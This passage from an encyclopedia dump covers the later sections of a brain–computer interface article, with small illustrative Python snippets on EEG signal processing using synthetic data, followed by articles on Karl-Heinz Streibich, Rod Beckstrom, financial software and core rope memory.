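def csp_features(trial, W):
    z = W @ trial                               # spatially filtered signals
    var = z.var(axis=1)
    return np.log(var / var.sum())              # log-variance features for a classifier

# Synthetic example: 20 trials per class, 8 channels, 500 samples.
a = np.random.randn(20, 8, 500); b = np.random.randn(20, 8, 500)
W = csp_filters(a, b)
features = csp_features(a[0], W)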
Bio/neurofeedback for passive BCI designs
Biofeedback is used to monitor a subject's mental relaxation. In some cases, biofeedback does not monitor electroencephalography (EEG), but instead bodily parameters such as electromyography (EMG), galvanic skin resistance (GSR), and heart rate variability (HRV). Many biofeedback systems are used to treat certain disorders such as attention deficit hyperactivity disorder (ADHD), sleep problems in children, teeth grinding, and chronic pain. EEG biofeedback systems typically monitor four different bands (theta: 4–7 Hz, alpha: 8–12 Hz, SMR: 12–15 Hz, beta: 15–18 Hz) and challenge the subject to control them. Passive BCI involves using BCI to enrich human–machine interaction with implicit information on the actual user's state, for example, simulations to detect when users intend to push brakes during an emergency car stopping procedure. Game developers using passive BCIs need to acknowledge that through repetition of game levels the user's cognitive state will change or adapt. Within the first play of a level, the user will react to things differently from during the second play: for example, the user will be less surprised at an event in the game if he/she is expecting it.
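A minimal band-power computation for the EEG bands listed above might look like the following; the sampling rate and the synthetic signal are assumptions, and a real neurofeedback loop would stream data and update these values continuously.

import numpy as np
from scipy.signal import welch

# Band-power estimation for the neurofeedback bands named above.
BANDS = {"theta": (4, 7), "alpha": (8, 12), "SMR": (12, 15), "beta": (15, 18)}
fs = 256                                         # assumed sampling rate (Hz)
eeg = np.random.randn(fs * 10)                   # 10 s of one-channel stand-in EEG

freqs, psd = welch(eeg, fs=fs, nperseg=fs * 2)   # power spectral density
freq_res = freqs[1] - freqs[0]
band_power = {name: psd[(freqs >= lo) & (freqs <= hi)].sum() * freq_res
              for name, (lo, hi) in BANDS.items()}
print(band_power)                                # values a neurofeedback loop could threshold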
Visual evoked potential (VEP)
A VEP is an electrical potential recorded after a subject is presented with a type of visual stimuli. There are several types of VEPs.
Steady-state visually evoked potentials (SSVEPs) use potentials generated by exciting the retina with visual stimuli modulated at certain frequencies. SSVEP stimuli are often formed from alternating checkerboard patterns and at times simply use flashing images. The frequency of the phase reversal of the stimulus used can be clearly distinguished in the spectrum of an EEG; this makes detection of SSVEP stimuli relatively easy. SSVEP has proved to be successful within many BCI systems. This is due to several factors: the signal elicited is measurable in as large a population as the transient VEP, and blink-movement and electrocardiographic artefacts do not affect the frequencies monitored. In addition, the SSVEP signal is exceptionally robust; the topographic organization of the primary visual cortex is such that a broad area receives afferents from the central or foveal region of the visual field. SSVEP does have several problems, however. As SSVEPs use flashing stimuli to infer a user's intent, the user must gaze at one of the flashing or iterating symbols in order to interact with the system. It is, therefore, likely that the symbols could become irritating and uncomfortable to use during longer play sessions, which can often last more than an hour, making for less than ideal gameplay.
Another type of VEP used in applications is the P300 potential. The P300 event-related potential is a positive peak in the EEG that occurs roughly 300 ms after the appearance of a target stimulus (a stimulus for which the user is waiting or seeking) or an oddball stimulus. The P300 amplitude decreases as the target stimuli and the ignored stimuli grow more similar. The P300 is thought to be related to a higher-level attention process or an orienting response. Using the P300 as a control scheme has the advantage that the participant only has to attend limited training sessions. The first application to use the P300 model was the P300 matrix. Within this system, a subject would choose a letter from a grid of 6 by 6 letters and numbers. The rows and columns of the grid flashed sequentially, and every time the selected "choice letter" was illuminated the user's P300 was (potentially) elicited. However, the communication process, at approximately 17 characters per minute, was quite slow. The P300 offers discrete selection rather than a continuous control mechanism. The advantage of P300 use within games is that the player does not have to learn a completely new control system and so only has to undertake short training instances, to learn the gameplay mechanics and basic use of the BCI paradigm.
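The row/column selection logic of a P300 matrix speller can be illustrated with the following sketch, which averages the EEG epochs following each flash and picks the row and column with the strongest response around 300 ms. The timing window, repetition count, and the injected response are illustrative assumptions rather than values from any particular speller.

import numpy as np

n_rows = n_cols = 6
fs = 256
epoch = int(0.6 * fs)                                   # 600 ms of EEG after each flash
p300_window = slice(int(0.25 * fs), int(0.45 * fs))     # roughly around 300 ms

# row_epochs[r] holds all epochs recorded when row r flashed (same for columns);
# here we use random stand-in data with an injected response for row 2, column 4.
rng = np.random.default_rng(0)
row_epochs = rng.standard_normal((n_rows, 10, epoch))
col_epochs = rng.standard_normal((n_cols, 10, epoch))
row_epochs[2, :, p300_window] += 1.0
col_epochs[4, :, p300_window] += 1.0

def pick(epochs):
    avg = epochs.mean(axis=1)                           # average over repetitions
    return int(np.argmax(avg[:, p300_window].mean(axis=1)))

print("selected cell:", pick(row_epochs), pick(col_epochs))   # -> 2 4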
Synthetic telepathy/silent communication
In a $6.3 million US Army initiative to invent devices for telepathic communication, Gerwin Schalk, underwritten by a $2.2 million grant, found that ECoG signals can discriminate the vowels and consonants embedded in spoken and imagined words, shedding light on the distinct mechanisms associated with the production of vowels and consonants, and potentially providing a basis for brain-based communication using imagined speech.
In 2002 Kevin Warwick had an array of 100 electrodes fired into his nervous system in order to link his nervous system into the Internet to investigate enhancement possibilities. With this in place Warwick successfully carried out a series of experiments. With electrodes also implanted into his wife's nervous system, they conducted the first direct electronic communication experiment between the nervous systems of two humans.
Another group of researchers was able to achieve conscious brain-to-brain communication between two people separated by a distance using non-invasive technology in contact with the scalps of the participants. The words were encoded as binary streams of 0s and 1s produced by the imagined motor activity of the person "emitting" the information. In this experiment, pseudo-random bit streams encoding the words "hola" ("hi" in Spanish) and "ciao" ("goodbye" in Italian) were transmitted mind-to-mind between humans separated by a distance, with blocked motor and sensory systems, a result with a low to negligible probability of having occurred by chance.
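A toy version of the encoding step is shown below: a word is converted into a bit stream that could then be conveyed one bit at a time (for example, imagined movement for 1, rest for 0). The UTF-8 bit coding used here is an arbitrary choice for illustration and is not the coding scheme used in the actual experiment.

# Encode a word as bits and decode it back; purely illustrative.
def word_to_bits(word):
    return [int(b) for ch in word.encode("utf-8") for b in format(ch, "08b")]

def bits_to_word(bits):
    chars = [int("".join(map(str, bits[i:i + 8])), 2) for i in range(0, len(bits), 8)]
    return bytes(chars).decode("utf-8")

bits = word_to_bits("hola")
assert bits_to_word(bits) == "hola"
print(len(bits), "bits to transmit")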
Research into synthetic telepathy using subvocalization is taking place at the University of California, Irvine under lead scientist Mike D'Zmura. The first such communication took place in the 1960s using EEG to create Morse code using brain alpha waves. Using EEG to communicate imagined speech is less accurate than the invasive method of placing an electrode between the skull and the brain. On 27 February 2013 the group with Miguel Nicolelis at Duke University and IINN-ELS successfully connected the brains of two rats with electronic interfaces that allowed them to directly share information, in the first-ever direct brain-to-brain interface.
Cell-culture BCIs
Researchers have built devices to interface with neural cells and entire neural networks in cultures outside animals. As well as furthering research on animal implantable devices, experiments on cultured neural tissue have focused on building problem-solving networks, constructing basic computers and manipulating robotic devices. Research into techniques for stimulating and recording from individual neurons grown on semiconductor chips is sometimes referred to as neuroelectronics or neurochips.
Development of the first working neurochip was claimed by a Caltech team led by Jerome Pine and Michael Maher in 1997. The Caltech chip had room for 16 neurons.
In 2003 a team led by Theodore Berger, at the University of Southern California, started work on a neurochip designed to function as an artificial or prosthetic hippocampus. The neurochip was designed to function in rat brains and was intended as a prototype for the eventual development of higher-brain prosthesis. The hippocampus was chosen because it is thought to be the most ordered and structured part of the brain and is the most studied area. Its function is to encode experiences for storage as long-term memories elsewhere in the brain.
In 2004 Thomas DeMarse at the University of Florida used a culture of 25,000 neurons taken from a rat's brain to fly an F-22 fighter jet simulator. After collection, the cortical neurons were cultured in a petri dish and rapidly began to reconnect to form a living neural network. The cells were arranged over a grid of 60 electrodes and used to control the pitch and yaw functions of the simulator. The study's focus was on understanding how the human brain performs and learns computational tasks at a cellular level.
Collaborative BCIs
The idea of combining/integrating brain signals from multiple individuals was introduced at Humanity+ @Caltech, in December 2010, by a Caltech researcher at JPL, Adrian Stoica; Stoica referred to the concept as multi-brain aggregation. A provisional patent application was filed on January 19, 2011, with the non-provisional patent following one year later. In May 2011, Yijun Wang and Tzyy-Ping Jung published, “A Collaborative Brain-Computer Interface for Improving Human Performance", and in January 2012 Miguel Eckstein published, “Neural decoding of collective wisdom with multi-brain computing”. Stoica's first paper on the topic appeared in 2012, after the publication of his patent application. Given the timing of the publications between the patent and papers, Stoica, Wang & Jung, and Eckstein independently pioneered the concept, and are all considered as founders of the field. Later, Stoica would collaborate with University of Essex researchers, Riccardo Poli and Caterina Cinel. The work was continued by Poli and Cinel, and their students: Ana Matran-Fernandez, Davide Valeriani, and Saugat Bhattacharyya.
Ethical considerations
User-centric issues
Long-term effects to the user remain largely unknown.
Obtaining informed consent from people who have difficulty communicating.
The consequences of BCI technology for the quality of life of patients and their families.
Health-related side-effects (e.g. neurofeedback of sensorimotor rhythm training is reported to affect sleep quality).
Therapeutic applications and their potential misuse.
Safety risks
Non-convertibility of some of the changes made to the brain
Legal and social
Issues of accountability and responsibility: claims that the influence of BCIs overrides free will and control over sensory-motor actions, claims that cognitive intention was inaccurately translated due to a BCI malfunction.
Personality changes caused by deep brain stimulation.
Concerns regarding the state of becoming a "cyborg" - having parts of the body that are living and parts that are mechanical.
Questions of personality: what does it mean to be human?
Blurring of the division between human and machine and inability to distinguish between human vs. machine-controlled actions.
Use of the technology in advanced interrogation techniques by governmental authorities.
Selective enhancement and social stratification.
Questions of research ethics regarding animal experimentation
Questions of research ethics that arise when progressing from animal experimentation to application in human subjects.
Moral questions
Mind reading and privacy.
Tracking and "tagging" systems
Mind control.
Movement control
Emotion control
In their current form, most BCIs are far removed from the ethical issues considered above. They are actually similar to corrective therapies in function. Clausen stated in 2009 that "BCIs pose ethical challenges, but these are conceptually similar to those that bioethicists have addressed for other realms of therapy". Moreover, he suggests that bioethics is well-prepared to deal with the issues that arise with BCI technologies. Haselager and colleagues pointed out that expectations of BCI efficacy and value play a great role in ethical analysis and the way BCI scientists should approach media. Furthermore, standard protocols can be implemented to ensure ethically sound informed-consent procedures with locked-in patients.
The case of BCIs today has parallels in medicine, as will its evolution. Just as pharmaceutical science began as a way to compensate for impairments and is now used to increase focus and reduce the need for sleep, BCIs will likely transform gradually from therapies to enhancements. Efforts are being made within the BCI community to create consensus on ethical guidelines for BCI research, development and dissemination. As innovation continues, ensuring equitable access to BCIs will be crucial; otherwise generational inequalities can arise that adversely affect the right to human flourishing.
The ethical considerations of BCIs are essential to the development of future implanted devices. End-users, ethicists, researchers, funding agencies, physicians, corporations, and all others involved in BCI use should consider the anticipated, and unanticipated, changes that BCIs will have on human autonomy, identity, privacy, and more.
Low-cost BCI-based interfaces
Recently a number of companies have scaled back medical-grade EEG technology to create inexpensive BCIs for research as well as entertainment purposes. For example, toys such as the NeuroSky and Mattel MindFlex have seen some commercial success.
In 2006 Sony patented a neural interface system allowing radio waves to affect signals in the neural cortex.
In 2007 NeuroSky released the first affordable consumer based EEG along with the game NeuroBoy. This was also the first large scale EEG device to use dry sensor technology.
In 2008 OCZ Technology developed a device for use in video games relying primarily on electromyography.
In 2008 Final Fantasy developer Square Enix announced that it was partnering with NeuroSky to create a game, Judecca.
In 2009 Mattel partnered with NeuroSky to release the Mindflex, a game that used an EEG to steer a ball through an obstacle course. It is by far the best selling consumer based EEG to date.
In 2009 Uncle Milton Industries partnered with NeuroSky to release the Star Wars Force Trainer, a game designed to create the illusion of possessing the Force.
In 2009 Emotiv released the EPOC, a 14 channel EEG device that can read 4 mental states, 13 conscious states, facial expressions, and head movements. The EPOC is the first commercial BCI to use dry sensor technology, which can be dampened with a saline solution for a better connection.
In November 2011 Time magazine selected "necomimi" produced by Neurowear as one of the best inventions of the year. The company announced that it expected to launch a consumer version of the garment, consisting of catlike ears controlled by a brain-wave reader produced by NeuroSky, in spring 2012.
In February 2014 They Shall Walk (a nonprofit organization focused on constructing exoskeletons, dubbed LIFESUITs, for paraplegics and quadriplegics) began a partnership with James W. Shakarji on the development of a wireless BCI.
In 2016, a group of hobbyists developed an open-source BCI board that sends neural signals to the audio jack of a smartphone, dropping the cost of entry-level BCI to £20. Basic diagnostic software is available for Android devices, as well as a text entry app for Unity.
In 2020, NextMind released a dev kit including an EEG headset with dry electrodes at $399. The device can be played with some demo applications or developers can create their own use cases using the provided Software Development Kit.
Future directions
A consortium consisting of 12 European partners has completed a roadmap to support the European Commission in their funding decisions for the new framework program Horizon 2020. The project, which was funded by the European Commission, started in November 2013 and published a roadmap in April 2015. A 2015 publication led by Dr. Clemens Brunner describes some of the analyses and achievements of this project, as well as the emerging Brain-Computer Interface Society. For example, this article reviewed work within this project that further defined BCIs and applications, explored recent trends, discussed ethical issues, and evaluated different directions for new BCIs.
Other recent publications have also explored future BCI directions for new groups of disabled users (e.g., persons with disorders of consciousness, discussed below).
Disorders of consciousness (DOC)
Some persons have a disorder of consciousness (DOC). This state is defined to include persons with coma, as well as persons in a vegetative state (VS) or minimally conscious state (MCS). New BCI research seeks to help persons with DOC in different ways. A key initial goal is to identify patients who are able to perform basic cognitive tasks, which would of course lead to a change in their diagnosis. That is, some persons who are diagnosed with DOC may in fact be able to process information and make important life decisions (such as whether to seek therapy, where to live, and their views on end-of-life decisions regarding them). Some persons who are diagnosed with DOC die as a result of end-of-life decisions, which may be made by family members who sincerely feel this is in the patient's best interests. Given the new prospect of allowing these patients to provide their views on this decision, there would seem to be a strong ethical pressure to develop this research direction to guarantee that DOC patients are given an opportunity to decide whether they want to live.
These and other articles describe new challenges and solutions to use BCI technology to help persons with DOC. One major challenge is that these patients cannot use BCIs based on vision. Hence, new tools rely on auditory and/or vibrotactile stimuli. Patients may wear headphones and/or vibrotactile stimulators placed on the wrists, neck, leg, and/or other locations. Another challenge is that patients may fade in and out of consciousness, and can only communicate at certain times. This may indeed be a cause of mistaken diagnosis. Some patients may only be able to respond to physicians' requests during a few hours per day (which might not be predictable ahead of time) and thus may have been unresponsive during diagnosis. Therefore, new methods rely on tools that are easy to use in field settings, even without expert help, so family members and other persons without any medical or technical background can still use them. This reduces the cost, time, need for expertise, and other burdens with DOC assessment. Automated tools can ask simple questions that patients can easily answer, such as "Is your father named George?" or "Were you born in the USA?" Automated instructions inform patients that they may convey yes or no by (for example) focusing their attention on stimuli on the right vs. left wrist. This focused attention produces reliable changes in EEG patterns that can help determine that the patient is able to communicate. The results could be presented to physicians and therapists, which could lead to a revised diagnosis and therapy. In addition, these patients could then be provided with BCI-based communication tools that could help them convey basic needs, adjust bed position and HVAC (heating, ventilation, and air conditioning), and otherwise empower them to make major life decisions and communicate.
Motor recovery
People may lose some of their ability to move due to many causes, such as stroke or injury. Research in recent years has demonstrated the utility of EEG-based BCI systems in aiding motor recovery and neurorehabilitation in patients who have suffered a stroke. Several groups have explored systems and methods for motor recovery that include BCIs. In this approach, a BCI measures motor activity while the patient imagines or attempts movements as directed by a therapist. The BCI may provide two benefits: (1) if the BCI indicates that a patient is not imagining a movement correctly (non-compliance), then the BCI could inform the patient and therapist; and (2) rewarding feedback such as functional stimulation or the movement of a virtual avatar also depends on the patient's correct movement imagery.
So far, BCIs for motor recovery have relied on the EEG to measure the patient's motor imagery. However, studies have also used fMRI to study different changes in the brain as persons undergo BCI-based stroke rehabilitation training. Imaging studies combined with EEG-based BCI systems hold promise for investigating neuroplasticity during motor recovery post-stroke. Future systems might include fMRI and other measures for real-time control, such as functional near-infrared spectroscopy, probably in tandem with EEG. Non-invasive brain stimulation has also been explored in combination with BCIs for motor recovery. In 2016, scientists from the University of Melbourne published preclinical proof-of-concept data related to a potential brain-computer interface technology platform being developed for patients with paralysis to facilitate control of external devices such as robotic limbs, computers and exoskeletons by translating brain activity. Clinical trials are currently underway.
Functional brain mapping
Each year, about 400,000 people undergo brain mapping during neurosurgery. This procedure is often required for people with tumors or epilepsy that do not respond to medication. During this procedure, electrodes are placed on the brain to precisely identify the locations of structures and functional areas. Patients may be awake during neurosurgery and asked to perform certain tasks, such as moving fingers or repeating words. This is necessary so that surgeons can remove only the desired tissue while sparing other regions, such as critical movement or language regions. Removing too much brain tissue can cause permanent damage, while removing too little tissue can leave the underlying condition untreated and require additional neurosurgery. Thus, there is a strong need to improve both methods and systems to map the brain as effectively as possible.
In several recent publications, BCI research experts and medical doctors have collaborated to explore new ways to use BCI technology to improve neurosurgical mapping. This work focuses largely on high gamma activity, which is difficult to detect with non-invasive means. Results have led to improved methods for identifying key areas for movement, language, and other functions. A recent article addressed advances in functional brain mapping and summarized a workshop on the topic.
Flexible devices
Flexible electronics are polymers or other flexible materials (e.g. silk, pentacene, PDMS, Parylene, polyimide) printed with circuitry; the flexible nature of the background materials allows the resulting electronics to bend, and the fabrication techniques used to create these devices resemble those used to create integrated circuits and microelectromechanical systems (MEMS). Flexible electronics were first developed in the 1960s and 1970s, but research interest increased in the mid-2000s.
Flexible neural interfaces have been extensively tested in recent years in an effort to minimize brain tissue trauma related to mechanical mismatch between electrode and tissue. Minimizing tissue trauma could, in theory, extend the lifespan of BCIs relying on flexible electrode-tissue interfaces.
Neural dust
Neural dust refers to millimeter-sized devices operated as wirelessly powered nerve sensors, proposed in a 2011 paper from the University of California, Berkeley, Wireless Research Center that described both the challenges and the potential benefits of creating a long-lasting wireless BCI. In one proposed model of the neural dust sensor, the transistor model allowed for a method of separating local field potentials from action potential "spikes", which would greatly diversify the data obtainable from the recordings.
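The separation of local field potentials from spikes can be illustrated with conventional band-splitting, as in the sketch below. The cutoff frequencies, sampling rate, and threshold rule are standard textbook choices, not specifications of the proposed neural dust hardware.

import numpy as np
from scipy.signal import butter, sosfiltfilt

# Illustrative separation of local field potentials (LFPs) from spikes by
# frequency band; all parameters are conventional assumed values.
fs = 30_000                                           # assumed sampling rate (Hz)
raw = np.random.randn(fs)                             # 1 s of stand-in extracellular data

lfp_sos = butter(4, 300, btype="lowpass", fs=fs, output="sos")
spike_sos = butter(4, [300, 6000], btype="bandpass", fs=fs, output="sos")

lfp = sosfiltfilt(lfp_sos, raw)                       # slow population activity
spike_band = sosfiltfilt(spike_sos, raw)              # fast single-unit activity

# Simple threshold crossing to mark candidate spikes.
threshold = -4 * np.median(np.abs(spike_band)) / 0.6745
spike_times = np.flatnonzero(spike_band < threshold) / fs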
See also
Informatics
AlterEgo, a system that reads unspoken verbalizations and responds with bone-conduction headphones
Augmented learning
Biological machine
Cortical implants
Deep brain stimulation
Human senses
Kernel (neurotechnology company)
Lie detection
Microwave auditory effect
Neural engineering
Neuralink
Neurorobotics
Neurostimulation
Nootropic
Project Cyborg
Simulated reality
Telepresence
Thought identification
Whole brain emulation
Notes
References
Further reading
Brouse, Andrew. "A Young Person's Guide to Brainwave Music: Forty years of audio from the human EEG". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
Gupta, Cota Navin and Ramaswamy Palanappian. "Using High-Frequency Electroencephalogram in Visual and Auditory-Based Brain-Computer Interface Designs". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
Ouzounian, Gascia. "The Biomuse Trio in Conversation: An Interview with R. Benjamin Knapp and Eric Lyon". eContact! 14.2 – Biotechnological Performance Practice / Pratiques de performance biotechnologique (July 2012). Montréal: CEC.
External links
The Unlock Project
DARPA projects
Human–computer interaction
Implants (medicine)
User interface techniques
Virtual reality
|
29649210
|
https://en.wikipedia.org/wiki/Karl-Heinz%20Streibich
|
Karl-Heinz Streibich
|
Karl-Heinz Streibich (born 1952) is a German manager who served as chairman of the executive board and chief executive officer of the Germany-based software company Software AG from 2003 until 2018. Prior to that he was deputy chairman and deputy chief executive officer of T-Systems.
Early life and education
Streibich was born in Germany. He holds a degree in communications engineering from the Offenburg University, Germany.
Career
Streibich started his career in 1981 at Dow Chemical Company in Rheinmünster, Germany, as a software development engineer. Three years later he joined ITT Industries as a product marketing manager, then moved to ITT-SEL AG (now Alcatel-Lucent) as managing director of the PC business. He joined Daimler Benz AG in 1989, where he held several IT-related executive positions before serving as deputy chairman and deputy chief executive officer of Debis Systemhaus, facilitating the merger with T-Systems between 2000 and 2002. He is a member of the supervisory board (Aufsichtsrat) at Deutsche Messe AG and holds several honorary positions, including member of the presidency of the German IT association BITKOM and co-chairman of the platform "Digital administration and public IT" within the framework of the German Chancellor's IT summit, and he is a co-founder of the German Software Cluster of Excellence.
From 2003 until 2018 Streibich served as chairman of the executive board and chief executive officer of the Germany-based software company Software AG. In this capacity, he was also responsible for the company's corporate marketing, audit, processes & quality, legal affairs, and corporate communications. Under his leadership, Software AG acquired webMethods for $546 million in cash to add networking software to its product line.
Streibich is the author of the book entitled The Digital Enterprise, published in 2014.
Other activities
Corporate boards
Software AG, Member of the Supervisory Board (since 2020)
Munich Re, Member of the Supervisory Board (since 2019)
Siemens Healthineers, Member of the Supervisory Board (since 2018)
Dürr AG, Member of the Supervisory Board (2011-2020), Chairman of the Supervisory Board (2018-2020)
Wittenstein, Member of the Supervisory Board (2017-2019)
Deutsche Messe, Member of the Supervisory Board (2013-2017)
Non-profit organizations
German Cancer Research Center (DKFZ), Member of the Advisory Council
Senckenberg Nature Research Society, Member of the Board of Trustees
References
1952 births
Living people
Businesspeople from Hesse
Software AG
|
10198560
|
https://en.wikipedia.org/wiki/Rod%20Beckstrom
|
Rod Beckstrom
|
Rod Beckstrom (born February 1961) is an American author, high-tech entrepreneur, and former CEO and President of ICANN. He previously served as Director of the National Cybersecurity Center.
Education and early work
Beckstrom received his BA with Honors and Distinction and an MBA from Stanford University, where he served as the Chairman of the Council of Presidents of the Associated Students of Stanford University.
In August 2007, Beckstrom and Peter Thoeny, author of TWiki co-launched TWIKI.NET, a Web 2.0 company that supports TWiki, an open source wiki. Beckstrom became Chairman and Chief Catalyst. He was also co-founder, Chairman and CEO of CATS Software Inc., a derivatives and risk management software company which went public on NASDAQ and later was sold to Misys PLC.
Author
He is co-author of the best-selling book The Starfish And the Spider, which lays out a new organizational theory that places all organizations on a continuum from centralized to decentralized, with different implications and strategies for each firm based upon its position on that axis. In interviews with The Washington Post and USA Today, Beckstrom explains how, using the 'Starfish' concept illustrated in The Starfish And the Spider, the U.S. Government can take a different approach in its dealings with Al-Qaeda. Beckstrom is also the formulator of an economic model for valuing networks, Beckstrom's law, which was presented at BlackHat 2009 and Defcon 2009.
Beckstrom, a pioneer in the field of derivatives trading and firm-wide risk management, was coached by Nobel Laureate William F. Sharpe, which resulted in the first book on a new theory, "Value at Risk."
National Cyber Security Center
On March 20, 2008, Beckstrom was appointed to run the newly created National Cybersecurity Center, a position requiring "advanced thought leadership in areas like coordination, collaboration and team work in order to best serve the mission".
On March 5, 2009, less than a year after the position was created, he stated that he would resign as Director of the National Cybersecurity Center (NCSC) on Friday, March 13, 2009. He recommended Deputy Director Mary Ellen Seale as his successor. He stated that a lack of cooperation from the NSA and insufficient funding led to his resignation, saying that he had received $500,000, which funded five weeks of operation. He stated that he supports a more decentralized approach and opposes the NSA's move to try to "rule over" the NCSC.
Presidency of ICANN
On 25 June 2009, at its 35th meeting in Sydney, Australia, the Board of ICANN resolved to appoint Rod Beckstrom as its CEO and President. At ICANN, he presided over a number of notable developments, including the 15 July 2010 DNSSEC signing of the DNS root and the 20 June 2011 opening of the gTLD namespace to additional applicants. On July 1, 2012 he was succeeded on an interim basis by ICANN's COO, who served as CEO pro tem until Beckstrom's permanent replacement, Fadi Chehade, took up the position on 1 October 2012.
Investor
Rod Beckstrom is the lead angel investor in the Encino, CA-based software development company American Legalnet Inc.
Volunteer work
An active participant in the non-profit arena, Beckstrom serves on the board of trustees of Environmental Defense Fund, an organization involved in designing, advocating and implementing environmental policy solutions, such as the Kyoto Protocol and the California Climate Act. He is also a trustee of Jamii Bora Trust, a micro-lending group with 170,000 members, based in Nairobi.
References
External links
Living people
Businesspeople in information technology
American foreign policy writers
American male non-fiction writers
George W. Bush administration personnel
1961 births
|
41667831
|
https://en.wikipedia.org/wiki/Financial%20software
|
Financial software
|
Financial software or financial system software is special application software that records all the financial activity within a business organization. Basic features of such a system include not only the modules of accounting software, such as accounts payable, accounts receivable, general ledger, reporting, and payroll, but also tools to explore alternative investment choices and calculate statistical relationships. Features of the system may vary depending on what type of business it is being used for. Primarily, the goal of financial software is to record, categorize, analyze, compile, interpret and then present accurate and up-to-date financial data for every transaction of the business.
Features of financial software
Pipeline tracking
Pipeline tracking is one of the key features of an accounting system and software for asset management. This provides summarized information on all the details pertaining to the potential investments that are being monitored. The system and software will organize the pipeline and record the source, execution status, approval status, feasible investment capital and the targeted purchase price. It provides an efficient analysis of the best deals, timing and price for the utilization of the investment team. Pipeline tracking provides tracking of the source, history and status. It also provides customized classifications and categories. The system can easily execute a cash flow model and create return assumptions.
Asset management
Asset management is another important feature of financial software. It uses the updated status of each investment to provide the tools needed to model every possible outcome, such as distressed future payments, debt-to-equity conversions, and loan maturities. It also provides efficient tracking of payment dates and rates. Updated financial statements are readily available, which makes it easy to determine credit standing and, as a result, make proper adjustments to projections. Asset management can modify payment dates, conversion of floating to fixed rates, deferred payments, interest rates, maturity extensions and repayment schedules. It also uses various assumptions to store and run multiple cases such as downside, base and upside.
Fund management
The next feature is fund management, which projects all investments and factors in the borrowing and operating costs of the fund in order to create a view of future cash levels and investment returns. This aids in the evaluation and structuring of any fund. Fund management combines the cash flow projections of all investments into a monthly summary, and supports customized assumptions on leverage cost, interest income, taxes and expenses. The system also models several cash allocation scenarios, such as reinvestments, distributions to investors and fresh investments, and analyses leverage and capital calls. Income statements and projected balance sheets can also be produced efficiently.
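To make the combination step concrete, here is a small sketch that rolls per-investment cash flow projections up into a fund-level monthly summary; the investment names and figures are invented.

```python
from collections import defaultdict

# (investment, month, projected cash flow) - hypothetical inputs
projections = [
    ("Loan A", "2024-01",  12_000), ("Loan A", "2024-02", 12_000),
    ("Bond B", "2024-01", -50_000), ("Bond B", "2024-02",  4_500),
]

monthly_summary = defaultdict(float)
for investment, month, cash_flow in projections:
    monthly_summary[month] += cash_flow

for month in sorted(monthly_summary):
    print(month, monthly_summary[month])   # 2024-01 -38000.0, 2024-02 16500.0
```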
Data warehousing
Another feature of financial software is data warehousing. This feature syncs with the accounting system and retrieves investment transactions, using customizable categories and names, which allows effortless re-categorization of investments. Investment statistics are calculated according to whichever computations the user selects at a given moment, and customized reports on investment performance can be created using any of the calculations programmed into the system's database. More than 100 calculations are typically programmed into the system, and additional ones can be added as needed. Investments can be grouped into groups or subgroups that are used to create totals, for example to compare the total value of fixed income holdings with equity investments.
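As a rough illustration of the grouping and totals described above, the snippet below buckets invented investments into user-defined categories and compares the fixed income total with the equity total.

```python
investments = [
    {"name": "Loan A",  "category": "fixed income", "value": 1_200_000},
    {"name": "Bond B",  "category": "fixed income", "value":   800_000},
    {"name": "Stake C", "category": "equity",       "value": 1_500_000},
]

totals = {}
for inv in investments:
    totals[inv["category"]] = totals.get(inv["category"], 0) + inv["value"]

print(totals)  # {'fixed income': 2000000, 'equity': 1500000}
print("fixed income share:", round(totals["fixed income"] / sum(totals.values()), 2))  # 0.57
```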
Uses of financial software
Use in pipeline tracking
Pipeline tracking has multiple benefits. It provides a standard layout for possible deals and detects deals that have been approved but are still awaiting execution. It provides an accurate comparison of the cost of an investment with its expected returns, and can readily produce a recycle plan for investment opportunities. It also helps build a diversified portfolio with potential returns by using information on target industries or regions, and it speeds up the decision-making of the financial investment committee.
Use in fund management
There are many benefits of the fund management feature of the financial software. Fund management can determine which specific investments are creating returns. It also pinpoints the availability or shortage of cash. It provides an evaluation of the leverage options as well as determines the effect on the returns. The system also creates a central and systematic modelling, management and analysis of the funds.
Use in asset management
The benefits of asset management include the creation of a platform for maintaining cash flow projections on investments, which eliminates the manual errors associated with standalone Excel models. Asset management increases scale and adds investments without loss of analytic perspective. Through this software, portfolio managers have a better grasp of an investment's performance level, as well as accurate information on whether the analysts' predictions were close to the investment's actual performance.
See also
Accounting software
Application software
References
|
575923
|
https://en.wikipedia.org/wiki/Core%20rope%20memory
|
Core rope memory
|
Core rope memory is a form of read-only memory (ROM) for computers. It was first used in the 1960s by early NASA Mars space probes and then in the Apollo Guidance Computer (AGC), which was programmed by the Massachusetts Institute of Technology (MIT) Instrumentation Lab and built by Raytheon.
Software written by MIT programmers was woven into core rope memory by female workers in factories. Some programmers nicknamed the finished product LOL memory, for Little Old Lady memory.
Memory density
By the standards of the time, a relatively large amount of data could be stored in a small installed volume of core rope memory: 72 kilobytes per cubic foot, or roughly 2.5 megabytes per cubic meter. This was about 18 times the amount of data per volume compared to standard read-write core memory: the Block II Apollo Guidance Computer used 36,864 sixteen-bit words of core rope memory (placed within one cubic foot) and 2,048 sixteen-bit words (15 data bits+1 parity bit) of magnetic core memory (within two cubic feet).
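The quoted figures can be checked with a little arithmetic; the snippet below only reworks the numbers already given in the paragraph above.

```python
words = 36_864            # sixteen-bit words of core rope in the Block II AGC
bits_per_word = 16
print(words * bits_per_word // 8)        # 73728 bytes = 72 KiB, in about one cubic foot

cubic_feet_per_cubic_metre = 35.3147
print(72 * cubic_feet_per_cubic_metre)   # ~2542 KiB, i.e. roughly 2.5 MB per cubic metre
```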
Popular culture
In some moon landing conspiracy theories, confusion between core rope and regular core memory is used to advance the claim that the Apollo mission computer memory system could never have passed through the Earth's magnetic field undisturbed. Regular core memory would likely be susceptible to transiting magnetic fields of this magnitude, whereas core rope is not.
References
External links
"Computer for Apollo" NASA/MIT film from 1965 which demonstrates how rope memory was manufactured.
Visual Introduction to the Apollo Guidance Computer, part 3: Manufacturing the Apollo Guidance Computer. – By Raytheon; hosted by the Library of the California Institute of Technology's History of Recent Science & Technology site (originally hosted by the Dibner Institute)
Computers in Spaceflight: The NASA Experience – By James Tomayko (Chapter 2, Part 5, "The Apollo guidance computer: Hardware")
Brent Hilbert from the University of British Columbia has a detailed explanation of how core rope memory works.
Software woven into wire: Core rope and the Apollo Guidance Computer, extensive blog post by computer restoration expert Ken Shirriff
Computer memory
Non-volatile memory
|
277716
|
